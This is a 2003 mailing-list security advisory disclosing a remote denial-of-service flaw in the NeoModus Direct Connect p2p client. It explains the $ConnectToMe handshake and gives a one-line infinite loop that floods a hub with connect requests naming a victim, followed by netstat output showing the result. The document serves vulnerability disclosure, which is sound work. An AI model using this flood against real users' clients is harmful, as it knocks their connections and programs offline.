sec-labs team proudly presents:
Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
and probably newest version.
by Lord YuP
13/07/2003
I. BACKGROUND
Direct Connect is a windows (i've found also a linux version but
i don't have time to test it) p2p file-sharing program, well
common nowadays.
II. DESCRIPTION
Appending to aDe DC Client to Client HandShake looks like:
Client <-> Client Communication in DC. 11-05-2002. By aDe
----------------------------------------------------------
ACTIVE FILE DOWNLOAD
----------------------
D = downloader
U = uploader
H = hub
D>H: $ConnectToMe <U's username> <D's IP and port>|
H>U: $ConnectToMe <U's username> <D's IP and port>|
...bla bla ... ;)
As u can guess, the Direct Connect client after receiving
"$Connect ToMe..." command from hub, tries to connect to
specyfic IP and PORT sent by the Downloader.
The attacker (evil-downloader) can send infinite requests
to HUB with specyfic marked ip:port causing DoS attack
in the Victim's client.
Little example:
Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }
Client: (runned "netstat -a")
TCP jin:1993 JIN:0 LISTENING
TCP jin:1995 JIN:0 LISTENING
TCP jin:1996 JIN:0 LISTENING
TCP jin:2005 JIN:0 LISTENING
TCP jin:2006 JIN:0 LISTENING
TCP jin:2007 JIN:0 LISTENING
TCP jin:2008 JIN:0 LISTENING
TCP jin:2009 JIN:0 LISTENING
TCP jin:2010 JIN:0 LISTENING
TCP jin:2011 JIN:0 LISTENING
TCP jin:2012 JIN:0 LISTENING
TCP jin:2013 JIN:0 LISTENING
TCP jin:2014 JIN:0 LISTENING
TCP jin:2015 JIN:0 LISTENING
TCP jin:2016 JIN:0 LISTENING
TCP jin:2017 JIN:0 LISTENING
TCP jin:2018 JIN:0 LISTENING
TCP jin:2019 JIN:0 LISTENING
...and so on...
III. IMPACT
The attacked client may be DoS-ed in case of that internet connection
can be reseted/stopped, some clients may flood with the "Out of Memory"
msgboxes in case of that, system may be not working correctly, and DC
client may be terminated.
--
sec-labs team [http://sec-labs.hack.pl]
This archive was generated by hypermail 2b30 : Mon Jul 14 2003 - 11:12:30 PDT